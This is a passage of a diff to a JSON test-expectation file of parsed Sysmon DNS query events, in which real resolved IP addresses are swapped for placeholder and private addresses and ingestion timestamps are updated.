"23.50.53.185" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741756100Z", + "ingested": "2021-12-09T13:50:23.457124400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -10112,27 +10011,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -10148,16 +10047,13 @@ "edw.edmunds.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741760Z", + "ingested": "2021-12-09T13:50:23.457130400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.548Z", @@ -10221,12 +10117,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -10242,13 +10138,13 @@ "ocsp.digicert.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741766100Z", + "ingested": "2021-12-09T13:50:23.457167Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10312,23 +10208,23 @@ "type": "CNAME" }, { - "data": "35.167.55.0", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.24.219.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.43.21.209", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.200.225.167", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10336,7 +10232,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10344,7 +10240,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10353,15 +10249,15 @@ } ], "resolved_ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, @@ -10378,22 +10274,19 @@ "pre-usermatch.targeting.unrulymedia.com" ], "ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741773100Z", + "ingested": "2021-12-09T13:50:23.457174200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10457,27 +10350,27 @@ "type": "CNAME" }, { - "data": "144.76.67.119", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.77.207", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.15.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "176.9.103.51", + "data": "89.160.20.156", "type": "A" }, { - "data": "88.198.208.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10485,7 +10378,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10493,7 +10386,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10501,23 +10394,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -10533,24 +10426,20 @@ "farm.plista.com" ], "ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741778900Z", + "ingested": "2021-12-09T13:50:23.457180200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10618,52 +10507,52 @@ "type": "CNAME" }, { - "data": "50.17.180.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.103.40", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.210.19", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.117.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.244", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.81.100", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.204.10.30", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -10680,21 +10569,14 @@ "beacon.krxd.net" ], "ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741786200Z", + "ingested": "2021-12-09T13:50:23.457186400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10741,7 +10623,7 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -10750,7 +10632,7 @@ 